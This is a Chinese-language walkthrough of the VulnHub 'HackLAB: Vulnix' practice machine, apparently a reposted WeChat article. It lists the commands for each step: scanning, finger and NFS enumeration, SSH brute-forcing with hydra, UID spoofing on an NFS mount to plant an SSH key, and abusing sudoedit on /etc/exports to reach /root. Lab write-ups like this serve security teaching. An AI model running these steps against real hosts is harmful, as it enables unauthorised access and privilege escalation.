虚拟机信息
虚拟机下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/
虚拟机简介:破解并通过任何您希望的方式获取隐藏在/root中的奖杯
目标:1个flag
级别:中级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.138
查看开放端口
3、渗透测试
3.1 服务渗透
1.测试SSH服务
searchsploit OpenSSH 5
未发现有用信息
2.测试finger服务
finger @192.168.207.138
finger [email protected]
finger [email protected]
3.查看NFS服务
showmount -e 192.168.207.138
4.挂载NFS服务
mount -t nfs 192.168.207.138:/home /tmp
查看挂载文件,无权限访问
5.SSH账号爆破
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.207.138 ssh
3.2 系统渗透
1.登录主机
ssh [email protected]
2.查看主机内核版本
uname -a
sudo -l
3.查看用户信息
4.挂载目录
mkdir /mnt/vulnix
mount 192.168.207.138:/home/vulnix /mnt/vulnix
5.创建相同权限用户
useradd -u 2008 vulnix
su vulnix
5.创建SSH密钥
ssh-keygen
6.复制内容到/tmp
cp /root/.ssh/id_rsa.pub /opt
chown vulnix:vulnix /opt/id_rsa.pub
7.切换用户保存密钥
mkdir /mnt/vulnix/.ssh
cat /opt/id_rsa.pub >> /mnt/vulnix/.ssh/authorized_keys
8.登录账号
ssh [email protected]
3.2 权限提升
1.查看sudo权限
sudo -l
2.执行权限命令查看
sudoedit /etc/exports
添加root目录权限
3.重启虚拟机并重新挂载
umount /mnt/vulnix
mount 192.168.207.138:/root /mnt/vulnix
4.查看flag
cd /mnt/vulnix
cat trophy.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之HackLAB
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论